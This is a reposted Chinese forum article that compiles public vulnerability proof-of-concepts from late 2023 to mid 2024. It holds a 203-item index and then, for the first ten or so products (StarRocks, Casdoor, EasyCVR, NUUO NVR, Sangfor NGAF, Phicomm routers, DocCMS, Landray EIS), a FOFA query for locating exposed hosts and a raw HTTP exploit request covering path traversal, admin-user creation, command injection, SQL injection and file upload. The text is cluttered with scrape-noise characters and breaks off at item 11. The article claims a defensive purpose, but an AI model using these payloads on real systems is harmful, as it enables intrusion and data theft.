找回密码
 立即注册
查看: 4941|回复: 0

互联网公开漏洞整理202309-202406--转载

[复制链接]
发表于 2024-6-5 14:31:29 | 显示全部楼层 |阅读模式
互联网公开漏洞整理202309-202406
1 G+ k! o& ^* S$ \/ ]" ^. q) L道一安全 2024-06-05 07:41 北京8 ^6 ^8 \6 @" R# z1 F- z# z
以下文章来源于网络安全新视界 ,作者网络安全新视界
0 m; |0 m7 f0 `" ^7 D; \& _% T
5 u1 l3 \* [- p发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。" |" ]. b$ N9 v; T- G
; A4 P( \/ V* C! a6 b( B
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。+ a% w# s. J+ [# ^

$ R8 l- Y8 K( L* H安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
/ X3 s; b& o! x
* ^) x$ c$ |' M1 P$ V8 ~* \文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
: q  p2 m: M! j# o- {& D
- p6 q- i3 M" j1 I; s4 _合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。+ f! Y4 M; k/ T" i
" y& d7 X0 B% s6 R; V

/ T, q: D9 _# X1 c  }& ]声明
' z6 w! U# P" R
2 z! L% Z* U9 e# E4 {) ~- n! C) T) \为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。6 j/ u) `1 S, h4 I

( p4 |' n  C- e' P有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
4 Z' ~' x1 A- n! W, y) H. ?
+ N; p1 q/ y7 k9 g8 [7 j7 N8 A* ?' ~6 x/ x8 R

5 e: _$ g8 C: t& B/ f目录
  l! S, i" I& L, m/ K  [
9 \; I# w* ]7 l; H4 _) a0 m4 v* g+ m1 Y01
' f3 n$ f" U5 U4 V  O9 P  v. ~3 q  _  X" S; y9 o1 N2 @
1. StarRocks MPP数据库未授权访问( \3 D; g0 S( ~; g% }9 V" p# f
2. Casdoor系统static任意文件读取
& c  S2 b# \0 S! M3. EasyCVR智能边缘网关 userlist 信息泄漏
/ Z8 L% `; E; u" b: P4. EasyCVR视频管理平台存在任意用户添加
) X' f! W- A9 i; `  ]8 V1 X5. NUUO NVR 视频存储管理设备远程命令执行
5 V& h1 b8 u0 O. \9 a5 A0 A6. 深信服 NGAF 任意文件读取. H* N1 w1 N3 w6 E* _! |) @. q
7. 鸿运主动安全监控云平台任意文件下载
7 J8 v* n6 u5 u& n* M) ]8. 斐讯 Phicomm 路由器RCE
* o) M: B# E; C6 u! g$ r: Y# o9. 稻壳CMS keyword 未授权SQL注入4 W1 [1 |) f6 d4 K
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
! E) W3 S/ j. G5 q+ @9 Z- ^6 `3 S11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入9 \2 b, N' i& `1 w  h  w' M
12. Jorani < 1.0.2 远程命令执行
* w0 y. q% b, t2 A$ l0 _13. 红帆iOffice ioFileDown任意文件读取
) d, n3 M" d  o+ C, C14. 华夏ERP(jshERP)敏感信息泄露& ^$ u4 {# }) P0 [* J+ J' j1 D1 o
15. 华夏ERP getAllList信息泄露
' a1 I. D, k# {1 H. U16. 红帆HFOffice医微云SQL注入/ E3 B! Z  d5 {8 r
17. 大华 DSS itcBulletin SQL 注入" P' |5 S4 }. M( e
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
& i* f8 l# l  ]# q4 C19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入! Q/ B! h& r, F8 t1 c
20. 大华ICC智能物联综合管理平台任意文件读取4 |0 m/ d& A$ T; J$ V
21. 大华ICC智能物联综合管理平台random远程代码执行
1 @- W2 }9 |/ W" X22. 大华ICC智能物联综合管理平台 log4j远程代码执行
  s2 G! D/ I0 {5 H, ^23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
) @3 r) |, z% ^) K; X# k5 K7 `9 l5 |24. 用友NC 6.5 accept.jsp任意文件上传; ~1 [$ R. O& B4 E( m8 p
25. 用友NC registerServlet JNDI 远程代码执行# k: N/ l$ W. ^' i
26. 用友NC linkVoucher SQL注入$ |+ G8 O: c1 ~9 w" a+ @
27. 用友 NC showcontent SQL注入
, [  ?& w- P, L6 S28. 用友NC grouptemplet 任意文件上传
$ P; s- K# D9 x% @29. 用友NC down/bill SQL注入
! @5 k% B& e- S' c30. 用友NC importPml SQL注入
; V( E: p& O; {# Z" R31. 用友NC runStateServlet SQL注入8 x  }( L& X/ S: l1 G; ?
32. 用友NC complainbilldetail SQL注入
. M: u8 l9 X, ]# Z- o$ h: \33. 用友NC downTax/download SQL注入# W3 e2 p% D& |8 E; f/ \, C" i. ^4 \  H" T
34. 用友NC warningDetailInfo接口SQL注入
$ X9 W8 L' Z" n4 l# Y0 t; E; b3 b35. 用友NC-Cloud importhttpscer任意文件上传7 |+ A8 a% ]9 `( w$ J, D( ^( K; A
36. 用友NC-Cloud soapFormat XXE/ c0 Z* [( B+ r* S+ w3 t* T
37. 用友NC-Cloud IUpdateService XXE* }4 q' A6 W1 b# `" g' S+ T8 ]
38. 用友U8 Cloud smartweb2.RPC.d XXE' c$ v& l, i. Y. e* ^  u
39. 用友U8 Cloud RegisterServlet SQL注入. K# O" W( u0 q) U- r- S
40. 用友U8-Cloud XChangeServlet XXE, e. w/ r$ j8 \& j% P' L
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入$ f  H% j% N! P4 |1 [
42. 用友GRP-U8 SmartUpload01 文件上传" P9 `0 B, J+ {2 Y$ Z, H9 W
43. 用友GRP-U8 userInfoWeb SQL注入致RCE: e" z+ d3 d5 P4 ?
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
: {+ C2 D* Z& h: |; v' C45. 用友GRP-U8 ufgovbank XXE) ~8 j) l1 |: s& b# h
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
% Q6 c* y# r# D/ w& L8 s9 g5 o. [) i47. 用友GRP A++Cloud 政府财务云 任意文件读取
3 S  n1 b  ?* }9 p1 f6 c- [/ x$ l48. 用友U8 CRM swfupload 任意文件上传
. l" f% X6 H3 W# i/ S# {5 N6 {1 W6 s49. 用友U8 CRM系统uploadfile.php接口任意文件上传" ~: r& s. Y: Z5 O8 K. F3 J
50. QDocs Smart School 6.4.1 filterRecords SQL注入
* P+ x% |9 C' H) O$ u! Y4 M; @, `51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入* Z2 @. T! L( H/ m& s. w; S
52. 泛微E-Office json_common.php sql注入2 g0 h' ^: E2 `; @; ^" g
53. 迪普 DPTech VPN Service 任意文件上传
" T/ t9 W5 h' T9 y9 a* k( U, k* p# z54. 畅捷通T+ getstorewarehousebystore 远程代码执行
; V' D- N7 E) x+ ~" V3 s55. 畅捷通T+ getdecallusers信息泄露1 _* h5 S2 d7 v2 l* N  g
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE- s5 G( k' ?: b5 f) o) m4 K
57. 畅捷通T+ keyEdit.aspx SQL注入
1 Q) g  L1 n7 |) A/ ]+ d58. 畅捷通T+ KeyInfoList.aspx sql注入
4 d) K; y7 }7 `1 M. D) ^# D59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行' I8 z% o+ {) M7 ?0 c6 o
60. 百卓Smart管理平台 importexport.php SQL注入. i4 H/ K! t- h+ p0 Z
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传$ D- o' V8 M5 u  A/ U) F
62. IP-guard WebServer 远程命令执行
9 F- T/ O& ~$ J, Q9 Q4 [' f63. IP-guard WebServer任意文件读取4 e$ z" N- f9 g. X5 g! \
64. 捷诚管理信息系统CWSFinanceCommon SQL注入# W, o0 ^( k1 G+ _, Z9 |
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
/ {3 g$ W" D% ~66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
% \) i; g' f. C2 z67. 万户ezOFFICE wpsservlet任意文件上传
: T% h# q5 F) W; c; l+ M( Y68. 万户ezOFFICE wf_printnum.jsp SQL注入
# ~9 `( w9 W- d) z" H9 B5 p3 j& r( p5 u69. 万户 ezOFFICE contract_gd.jsp SQL注入) `0 \, {: j2 G0 d
70. 万户ezEIP success 命令执行
- [8 [" G5 ~2 ?1 D7 R5 ~! W, A71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
7 D) q( n( d# k$ V4 C; T. o72. 致远OA getAjaxDataServlet XXE
; v; C' c: N7 g# _. p* p% H" R* w73. GeoServer wms远程代码执行
. {1 G: X$ _4 z2 e74. 致远M3-server 6_1sp1 反序列化RCE
6 y* {3 }7 |4 P, W75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE* @9 u$ C8 R4 G
76. 新开普掌上校园服务管理平台service.action远程命令执行* J# R7 V3 k/ E  P& J1 \
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
0 t* J( }" F  ]+ B' G5 @78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传/ g' U# L  v- U; l/ {, \% ]
79. BYTEVALUE 百为流控路由器远程命令执行
) V- G* X* v$ `80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
- l8 h- q" q! o% `; z" y8 P! O: Y81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
! X. m& k' M# G8 @- v82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
# J4 W9 F3 `0 D# }/ t83. JeecgBoot testConnection 远程命令执行
0 L0 p5 ?) L4 m84. Jeecg-Boot JimuReport queryFieldBySql 模板注入. H; s) k# ?* F! O; Q5 L
85. SysAid On-premise< 23.3.36远程代码执行1 W2 M8 `# j: R( i$ k0 d
86. 日本tosei自助洗衣机RCE
5 q5 K% k+ g3 {) Y7 _' \6 ~87. 安恒明御安全网关aaa_local_web_preview文件上传
9 r5 a2 H) ~5 |1 V9 W5 K88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
+ x$ x* ?4 Y! m89. 致远互联FE协作办公平台editflow_manager存在sql注入5 Y7 U7 m; f4 J$ k- B
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
4 ^3 v6 @5 X3 B2 n5 \8 _91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
1 M8 Z' M3 k$ g. z6 m92. 海康威视运行管理中心session命令执行
. F1 _$ z+ ]* B# M93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
& v% N, ?9 B" B. {4 I  k94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传# N4 F* \. a& b* p9 P# Z1 F
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行$ T$ [$ g9 x) [: A) E. K9 `
96. Apache OFBiz  18.12.11 groovy 远程代码执行& f% y& z8 @* @2 a, Q% i
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行7 @2 w5 t* k' Z7 `# R  @. B
98. SpiderFlow爬虫平台远程命令执行
8 B6 r/ y# ^- Y$ y+ I- G99. Ncast盈可视高清智能录播系统busiFacade RCE1 a  D: N4 \! d, z: o" q4 ~
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
9 e8 E- H8 M! [/ k101. ivanti policy secure-22.6命令注入
& J, R( ~2 u2 E0 ]102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
0 _1 W# P: Q* ^  t/ i# W103. Ivanti Pulse Connect Secure VPN XXE
; o# l$ Y: b0 J" P  A4 ?104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露$ E/ i9 x* \: \: ?" G
105. SpringBlade v3.2.0 export-user SQL 注入
% O8 N# E) `% U( Z  y2 `+ z2 q106. SpringBlade dict-biz/list SQL 注入: C/ P, l! Y& X& m; y
107. SpringBlade tenant/list SQL 注入
( d0 A* }( S" k$ O108. D-Tale 3.9.0 SSRF
" b. n- v) }2 Y109. Jenkins CLI 任意文件读取
: n9 @; I7 w% V: J! x4 b110. Goanywhere MFT 未授权创建管理员  a% z) S  a0 A- R1 J' W) I! n
111. WordPress Plugin HTML5 Video Player SQL注入! \% u& }! a: `% C
112. WordPress Plugin NotificationX SQL 注入
. Y5 x( R2 T1 @2 @& \5 F113. WordPress Automatic 插件任意文件下载和SSRF" N- O) I( T! V
114. WordPress MasterStudy LMS插件 SQL注入! b, n: {* C  S0 g% z
115. WordPress Bricks Builder <= 1.9.6 RCE
: g7 I( A+ |" K4 O6 C! T116. wordpress js-support-ticket文件上传
; [4 H5 F- b+ t117. WordPress LayerSlider插件SQL注入6 n5 N1 f; F1 O- P7 {
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
. ?" Z2 I" C! O' ~0 C119. 北京百绰智能S20后台sysmanageajax.php sql注入& X/ O  N9 v; J1 l
120. 北京百绰智能S40管理平台导入web.php任意文件上传
5 r1 x8 b' _' Z* p" ^" }% ^121. 北京百绰智能S42管理平台userattestation.php任意文件上传1 \( V( @2 M, x0 }; x- Y# x
122. 北京百绰智能s200管理平台/importexport.php sql注入4 X% t. n9 m6 y
123. Atlassian Confluence 模板注入代码执行
, E. ?, i7 z  g, O124. 湖南建研工程质量检测系统任意文件上传
7 g- e# V* F% D' M125. ConnectWise ScreenConnect身份验证绕过
& b1 B/ R$ V5 z3 p7 A- @8 S) h8 E126. Aiohttp 路径遍历
+ U/ w7 m8 C& t& B127. 广联达Linkworks DataExchange.ashx XXE
8 k  R6 q- q$ o7 v$ O128. Adobe ColdFusion 反序列化
  d6 O! z! W- B& O  f3 j, Q129. Adobe ColdFusion 任意文件读取
( h8 Y8 c6 u- x# z$ h130. Laykefu客服系统任意文件上传4 J+ X& j: C8 O6 Q1 R
131. Mini-Tmall <=20231017 SQL注入1 Q2 R; ~9 [" V; c! r) Y
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过' T& U, C$ I- E/ Q& @
133. H5 云商城 file.php 文件上传
% @" ~, L0 `& ]/ R6 ?5 t/ g134. 网康NS-ASG应用安全网关index.php sql注入
" B) v, L6 E$ f( \; u. _( B135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入5 Z2 ?6 w  b/ o! ?  x
136. NextChat cors SSRF
8 D3 a4 C! R% k% g( ]$ V3 S137. 福建科立迅通信指挥调度平台down_file.php sql注入
, M: |  E( l; x3 L: X( d3 S138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
3 z/ b- J* I& s' l$ s9 o2 b139. 福建科立讯通信指挥调度平台editemedia.php sql注入
, Y9 T; n: s% k1 h5 @140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
' T: y' T; O( m, B  t, h% Q141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
& Q; ?( p6 D) j8 q142. CMSV6车辆监控平台系统中存在弱密码
" P* g) Y6 o" ]0 M! x+ W7 H143. Netis WF2780 v2.1.40144 远程命令执行
2 f% E/ ^/ g* x( L" k144. D-Link nas_sharing.cgi 命令注入
! V& Y5 i& Y" _145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
$ J+ }7 `: V- u$ X) {4 i  r146. MajorDoMo thumb.php 未授权远程代码执行
9 [9 ~- u. Q9 z& r& q( t% Z147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
. c  p% [, E6 x) u0 L9 v% ~148. CrushFTP 认证绕过模板注入
& a" z* C7 F) i8 `: o5 ?149. AJ-Report开源数据大屏存在远程命令执行
% ~/ r9 G( P1 L% E4 }150. AJ-Report 1.4.0 认证绕过与远程代码执行
/ L& `6 m( U/ S2 N6 q2 U, U4 T151. AJ-Report 1.4.1 pageList sql注入
' C7 I  |" @) a9 W152. Progress Kemp LoadMaster 远程命令执行
2 G/ K5 R. K8 W2 `0 g! M6 I153. gradio任意文件读取0 N4 l6 `2 x- J. d9 O# g
154. 天维尔消防救援作战调度平台 SQL注入
9 j( W' @  M9 D7 ^( |) S$ s5 N7 \155. 六零导航页 file.php 任意文件上传! _2 Y) n3 i6 ~# {$ A
156. TBK DVR-4104/DVR-4216 操作系统命令注入
* T- b8 r) P& B2 l157. 美特CRM upload.jsp 任意文件上传3 t0 z1 R# o0 ]5 K( U
158. Mura-CMS-processAsyncObject存在SQL注入
# W9 Z5 v) _1 X) n2 x159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传5 F. X' `! I& F+ m' P
160. Sonatype Nexus Repository 3目录遍历与文件读取) [( j, W; _% C9 G2 T& F
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
8 u6 W  ]) Q' L9 K, U162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
6 F; l/ j9 D, j+ L+ t163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
8 t9 s0 l' N8 }( r! y* Y7 n1 c, C164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
/ S4 w( W) m! c* i+ g165. OrangeHRM 3.3.3 SQL 注入0 ]$ D9 n# r- U! ]( f
166. 中成科信票务管理平台SeatMapHandler SQL注入  p3 Z9 O& R% B& Q1 O5 r  x
167. 精益价值管理系统 DownLoad.aspx任意文件读取1 u: x/ x7 {5 ?
168. 宏景EHR OutputCode 任意文件读取6 ?4 m) Y# I! {  K
169. 宏景EHR downlawbase SQL注入" j" k0 h' T6 ~6 F
170. 宏景EHR DisplayExcelCustomReport 任意文件读取. @/ u! {. w2 C0 N5 g/ F6 I
171. 通天星CMSV6车载定位监控平台 SQL注入4 I/ V' `+ J+ W* i
172. DT-高清车牌识别摄像机任意文件读取% O  |$ a+ }$ U- ]9 S
173. Check Point 安全网关任意文件读取
6 W7 \0 {6 J2 b, l174. 金和OA C6 FileDownLoad.aspx 任意文件读取0 j( Z5 ?& u2 F+ O
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入! K7 p" x4 Y7 p8 w. V& A
176. 电信网关配置管理系统 rewrite.php 文件上传6 Y" m( W) r9 [5 T
177. H3C路由器敏感信息泄露
, p. V: [/ U, u178. H3C校园网自助服务系统-flexfileupload-任意文件上传
: S& Y9 W3 W" g1 `179. 建文工程管理系统存在任意文件读取
) u( Z3 J: ]. Y3 ~  W2 i180. 帮管客 CRM jiliyu SQL注入
, i$ t% ~5 s& C/ j: d) M181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
7 e/ M0 i; T7 i+ [; W3 w4 }% a' K182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
% E, C3 ?" U! X6 U0 ~183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
7 `0 Z* Z& ]9 D; M; _184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
$ s  @4 T9 |* v9 M- N185. 瑞友天翼应用虚拟化系统SQL注入
% u' Q& V( X3 I186. F-logic DataCube3 SQL注入/ ^; ~& t% b; U  U4 G, @* h; @
187. Mura CMS processAsyncObject SQL注入' i# b+ \# w. X( v; Z
188. 叁体-佳会视频会议 attachment 任意文件读取
9 [! O/ `+ }/ d2 h3 u! }1 [' e189. 蓝网科技临床浏览系统 deleteStudy SQL注入6 R  Q. @5 v# u5 J
190. 短视频矩阵营销系统 poihuoqu 任意文件读取3 k' |/ Z" }3 k3 s5 E" ~0 c9 M$ M
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
- U, P/ J6 p/ E4 h8 C192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
/ p; {( r) e! F* a; p: z193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
9 t, [; _. _0 ~/ E3 G. @" \194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传& y( R9 m/ a# s$ u4 \* O/ h
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
' h: E5 r+ G9 O196. 河南省风速科技统一认证平台密码重置5 ~& H* e6 w" h! T: _
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入+ F" N( h0 e2 v+ \* {* O$ [8 |$ g3 D
198.  阿里云盘 WebDAV 命令注入
5 Q. W* e" U: z( K199. cockpit系统assetsmanager_upload接口 文件上传6 a5 \& L) n8 _
200. SeaCMS海洋影视管理系统dmku SQL注入
. [; G! H. M3 n5 v8 z% o9 ?2 B201. 方正全媒体新闻采编系统 binary SQL注入
7 W# v7 S- n4 U) Y6 p202. 微擎系统 AccountEdit任意文件上传" e& ^( {/ a+ U. ?
203. 红海云EHR PtFjk 文件上传
% q* C4 k' N' Y; y7 C2 j: e8 s6 G6 a) p/ @4 K4 t
POC列表8 r1 O$ u- B7 C& H' S9 M, y
' }' ~: e# h0 u7 j
02( K7 n4 N- A# c, l0 Q5 Z
. ]) @4 z' y' p7 z1 \4 a
1. StarRocks MPP数据库未授权访问
$ l+ K- }: L, ~) \$ ]8 }+ W- j5 h9 EFOFA :title="StarRocks". G: D. y$ m; j3 j" R( k
GET /mem_tracker HTTP/1.1
' R- r; ^% V( q! U+ Q+ M: ]( lHost: URL1 D3 V" f- v; m6 S
0 Q! y1 o$ X  ^: n; j
' q3 M/ C8 d3 y9 O# c, T* _/ u; m- d
2. Casdoor系统static任意文件读取
) }; |2 g, E) |4 _: Y% xFOFA :title="Casdoor"' W; G- n) B; b) N$ v. f
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1  N' d/ J0 r! N4 G* W7 f
Host: xx.xx.xx.xx:9999
1 }1 C9 K9 P' V7 gUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" u' {  T; p2 T3 G0 L3 Y
Connection: close
4 L( J: `/ Y5 r9 [3 T1 JAccept: */*
2 x6 j( T# Y5 t' }Accept-Language: en& ~& g/ Y, u7 W
Accept-Encoding: gzip
! i& @! U( [3 V: X$ V+ v6 G4 X8 f( S; x+ e5 l/ Y
# Y  t9 v2 `" [, B% y+ ]
3. EasyCVR智能边缘网关 userlist 信息泄漏
/ g$ ]( ]5 ]# hFOFA :title="EasyCVR"
! K* D. w2 T1 y/ c( n" wGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
9 E, o! k" A3 XHost: xx.xx.xx.xx( x7 B( V+ L5 e; M$ h7 m2 J7 y6 p
- e: i2 y2 d; ~: C

; `9 M2 j4 n% N% `4. EasyCVR视频管理平台存在任意用户添加
/ V/ X+ [; _$ _9 Q) L! w* FFOFA :title="EasyCVR"
# ^. u, ?, ?% ]. A0 k
- z+ t6 q! |" X6 r0 m8 Epassword更改为自己的密码md5* W$ _. s- M9 |& w& D9 i
POST /api/v1/adduser HTTP/1.1
6 t6 @. g$ M+ G/ ~! ^3 ^Host: your-ip
% F' y7 t/ j! j# q- g/ G9 sContent-Type: application/x-www-form-urlencoded; charset=UTF-85 B2 L3 E" Y: X  W
% B# S, K# T8 O- }
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
6 ]  _* ]& H! k/ E/ j2 Y+ W
( |& R, k- u" P4 M% [0 _+ J# H2 J- p6 `
5. NUUO NVR 视频存储管理设备远程命令执行/ m7 u: _! f1 ?
FOFA:title="Network Video Recorder Login"
" `2 b! i& N# a! R! ^GET /__debugging_center_utils___.php?log=;whoami HTTP/1.14 B( T! s& e, {4 w
Host: xx.xx.xx.xx* G0 W( K8 x: h' I) K+ z; O

) M& |" B( x" X1 j6 j  r' b
( J6 i5 M6 n% ~7 A! Z6. 深信服 NGAF 任意文件读取
( a( M" \5 P; d" lFOFA:title="SANGFOR | NGAF"
7 U9 q2 W9 K$ P/ s1 L6 aGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1: a) g2 y+ r! w; k; R
Host:* Y1 y% M6 B8 z

7 X( T1 M: Z4 M" w; y; @2 ]- J- D: ~. W* g! J
7. 鸿运主动安全监控云平台任意文件下载; D( |$ s* m- D3 V. u& X/ t4 R7 h) X% G
FOFA:body="./open/webApi.html"- H) v1 x2 {& y" q# n8 O
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.16 u4 Q/ a( w' x: o
Host:8 F- D2 G: J7 r8 H- L

) g6 i9 R% s: I& R" B4 I4 N2 X- c8 S) E
8. 斐讯 Phicomm 路由器RCE
0 b( O/ {1 L+ j' S0 yFOFA:icon_hash="-1344736688", g$ d9 `5 _% o6 P2 S% H
默认账号admin登录后台后,执行操作
2 X7 Z0 h7 b2 w) L# u' x9 PPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1$ t7 b1 N( B8 i* h. u- O
Host: x.x.x.x6 i, k- t3 v2 `5 j
Cookie: sysauth=第一步登录获取的cookie* x3 n& r1 b: F
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz7 X( u& D+ {2 h& ^' q& D' ~0 P- f
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.369 d% W; n, _; i
/ w. y2 b6 f. `
------WebKitFormBoundaryxbgjoytz. y9 ^# ^( }( g" g; ]- L) ?: S4 N1 c9 {
Content-Disposition: form-data; name="wifiRebootEnablestatus"
% w8 r; Q. y& j3 R( q2 l5 I# M9 h: ~* ]. p9 h
%s
$ z  A/ p+ `4 z! z5 c. Z------WebKitFormBoundaryxbgjoytz- j; S. E8 }  v! w* G$ i$ L& X
Content-Disposition: form-data; name="wifiRebootrange"
7 F5 t' f7 F1 A  |- S1 w+ _2 F5 m3 `- @6 ?. z' t
12:00; id;+ g/ X% X  n# b8 k/ @2 O4 Q
------WebKitFormBoundaryxbgjoytz
6 d& I' {8 y6 k9 b' S% \9 a# vContent-Disposition: form-data; name="wifiRebootendrange"
% ?( K+ s' O; u2 ^) E0 i, x/ s. [& x
4 v# M2 j  q9 B2 ]  e%s:
( p7 m) V0 t6 r. ?, _------WebKitFormBoundaryxbgjoytz
2 B+ Y: ^4 R4 R5 M; OContent-Disposition: form-data; name="cururl2"$ |* ~& [8 E+ s2 w" C. S! p- o
+ B$ P5 p( \, p+ f2 X0 n4 D7 H

0 e! j& G. n- N# x------WebKitFormBoundaryxbgjoytz--. n9 z/ A$ }' W1 B& M9 V' v, i
/ U# F9 x& A, m# g# h# e- H1 S
; G1 a! Y' f" @  y* x8 m
9. 稻壳CMS keyword 未授权SQL注入' U- v3 A2 f: Z* \& @' D
FOFA:app="Doccms"5 ~+ r" `" G% V9 Q. S
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.19 B0 v5 u; z; u! j& f( U
Host: x.x.x.x
% v& ^6 z. j) H( M; w% \" {, |/ y/ N" _1 N2 s

0 {. }7 M& L) rpayload为下列语句的二次Url编码  u0 {* n; o  K# S& f; o0 T- e
# f) _* {- v- n# E" C
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
* ]# o; g" t8 S* \$ |& G
( h! e" W& Z" c/ J10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
; x! t/ x! h! L$ @FOFA:icon_hash="953405444"% @2 H4 G2 q' f: P
: }. {4 g8 n" g( W9 U( j: E
文件上传后响应中包含上传文件的路径
! e; _3 X( O8 pPOST /eis/service/api.aspx?action=saveImg HTTP/1.1& o: e# X% \$ g) Z1 i8 n6 t
Host: x.x.x.x:xx
5 G) ?) T6 |: E& I7 @- l( Q/ zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36$ I% L$ G, }! I9 \% M% t2 K  H
Content-Length: 197  f% `  f7 c, H! Z" o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.97 `9 K/ L/ l- p  Y2 W& H  ~
Accept-Encoding: gzip, deflate& {, d! t2 R. u# B2 V
Accept-Language: zh-CN,zh;q=0.91 y5 a3 Z3 W" d. P2 l( t2 w  o" k
Connection: close4 D( |& ~# \6 b' a; u( O2 c. m
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu% A1 z/ F* V. j

) M( N( b, X$ V------WebKitFormBoundaryxdgaqmqu- P6 m+ ?3 [8 e# @% w
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
1 p! g9 d1 ^' w2 e' eContent-Type: text/html
3 b, K& D0 i5 V. Y
9 i' K7 X: }8 I1 K5 Cjmnqjfdsupxgfidopeixbgsxbf
0 S' a1 G7 U' Q( ?! g0 |7 z) P0 D------WebKitFormBoundaryxdgaqmqu--* n+ k& K/ M' `

6 T* r* k- e7 }! e8 f/ [! p, J2 c+ s4 ]# Z, b+ V
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入" d' c6 c/ D& M" q0 _
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
